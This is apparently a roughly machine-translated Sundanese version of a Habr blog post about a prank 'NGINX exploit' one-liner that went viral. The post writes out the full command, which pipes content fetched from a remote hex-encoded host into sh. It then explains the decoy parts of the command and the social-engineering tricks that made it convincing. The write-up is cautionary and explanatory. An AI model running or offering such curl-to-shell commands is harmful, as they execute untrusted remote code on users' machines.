Catetan. narjamahkeun.:
TL; DR: Entong nganggo file pipelining dina sh atanapi bash dina kaayaan naon waé. Ieu mangrupikeun cara anu saé pikeun leungit kontrol komputer anjeun.
Abdi hoyong bagikeun sareng anjeun carita pondok ngeunaan garapan PoC komik anu diciptakeun dina 31 Mei. Anjeunna mucunghul promptly di respon kana warta ti
Sanggeus réngsé ngerjakeun téknik obfuscation anyar dina curl, kuring ngutip tweet asli sareng "bocorkeun PoC anu tiasa dianggo" anu diwangun ku hiji garis kode anu konon ngamangpaatkeun kerentanan anu kapanggih. Tangtu, ieu omong kosong lengkep. Kuring nganggap yén kuring bakal langsung kakeunaan, sareng anu pangsaéna kuring bakal nampi sababaraha retweet (aduh muhun).
Najan kitu, kuring teu bisa ngabayangkeun naon anu lumangsung salajengna. Popularitas tweet kuring melejit. Ahéng, dina momen (15:00 waktos Moscow 1 Juni) sababaraha urang geus sadar yén ieu téh palsu a. Seueur jalma anu nga-retweet deui tanpa mariksa pisan (sumawona ngaguman grafik ASCII anu saé anu kaluaran).
Tingali kumaha éndahna!
Sanaos sadayana puteran sareng warna ieu saé, éta écés yén jalma kedah ngajalankeun kode dina mesinna pikeun ningali éta. Kabeneran, browser dianggo cara nu sami, sarta digabungkeun jeung kanyataan yén kuring teu hayang pisan meunang kana masalah hukum, kode dikubur di situs abdi ngan nelepon gema tanpa nyobian masang atawa ngaéksekusi kode tambahan.
A digression leutik:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Téknik sosio-éléktronik (SEE) - leuwih ti ngan phishing
Kasalametan jeung familiarity éta bagian utama percobaan ieu. Jigana aranjeunna naon ngarah ka kasuksésan na. Garis paréntah jelas nunjukkeun kaamanan ku ngarujuk kana "127.0.0.1" (localhost anu terkenal). Localhost dianggap aman sareng data dina éta henteu kantos ngantunkeun komputer anjeun.
Familiarity mangrupikeun komponén SEE konci kadua tina percobaan. Kusabab panongton udagan utamana diwangun ku jalma akrab jeung dasar-dasar kaamanan komputer, hal anu penting pikeun nyieun kode ambéh bagian tina eta seemed akrab jeung akrab (ku kituna aman). Nginjeum unsur-unsur tina konsép eksploitasi kuno sareng ngagabungkeun aranjeunna dina cara anu teu biasa parantos kabuktosan suksés pisan.
Di handap ieu analisa detil ngeunaan hiji-liner. Sagalana dina daptar ieu ngagem alam kosmétik, sarta praktis euweuh diperlukeun pikeun operasi sabenerna na.
Komponén naon anu leres-leres diperyogikeun? Ieu -gsS
, -O 0x0238f06a
, |sh
jeung web server sorangan. Pangladén wéb henteu ngandung paréntah anu jahat, tapi ngan ukur nyayogikeun grafik ASCII nganggo paréntah echo
dina naskah anu aya dina index.html
. Lamun pamaké diasupkeun garis kalawan |sh
di tengah, index.html
dimuat jeung dieksekusi. Untungna, custodians sahiji web server teu boga niat goréng.
-
../../../%00
- ngagambarkeun bade saluareun diréktori; -
ngx_stream_module.so
- jalur ka modul NGINX acak; -
/bin/sh%00<'protocol:TCP'
- urang konon launching/bin/sh
dina mesin target sareng alihan kaluaran ka saluran TCP; -
-O 0x0238f06a#PLToffset
- bahan rusiah, supplemented#PLToffset
, Pikeun katingal a memori offset kumaha bae anu dikandung dina PLT; -
|sh;
- sempalan penting séjén. Urang kedah alihan kaluaran ka sh/bash supados ngaéksekusi kode anu asalna tina server wéb anu nyerang anu aya di0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- a dummy nu netcat nujul kana/dev/tcp/localhost
supaya sagalana kasampak aman deui. Kanyataanna, teu nanaon sarta kaasup dina garis pikeun kageulisan.
Ieu menyimpulkan decoding tina naskah hiji-baris jeung sawala ngeunaan aspék "rékayasa sosio-éléktronik" (phishing intricate).
Konfigurasi Web Server jeung Countermeasures
Kusabab seuseueurna palanggan kuring nyaéta infosec / hacker, kuring mutuskeun pikeun ngajantenkeun pangladén wéb sakedik langkung tahan kana ungkapan "minat" dina pihakna, ngan supados para lalaki gaduh hal anu kedah dilakukeun (sareng éta bakal pikaresepeun disetél). Abdi henteu badé daptar sadaya pitfalls di dieu saprak percobaan masih lumangsung, tapi di dieu aya sababaraha hal anu dilakukeun ku server:
- Aktif ngawas usaha distribusi dina jaringan sosial tangtu sareng ngagantikeun rupa-rupa gambar leutik sawangan pikeun ngadorong pangguna pikeun ngaklik tautan.
- Mindahkeun Chrome/Mozilla/Safari/jsb ka video promosi Thugcrowd tinimbang mintonkeun skrip cangkang.
- Watches pikeun tanda atra intrusion / Hacking blatant, lajeng dimimitian alihan requests ka server NSA (ha!).
- Masang Trojan, kitu ogé rootkit mios, dina sadaya komputer anu pangguna nganjang ka host tina browser biasa (ngan bercanda!).
Hiji bagian leutik tina antimér
Dina hal ieu, hiji-hijina tujuan kuring nyaéta pikeun ngawasaan sababaraha fitur Apache - khususna, aturan anu saé pikeun alihan pamundut - sareng panginten: naha henteu?
NGINX Exploit (Real!)
Ngalanggan
sumber: www.habr.com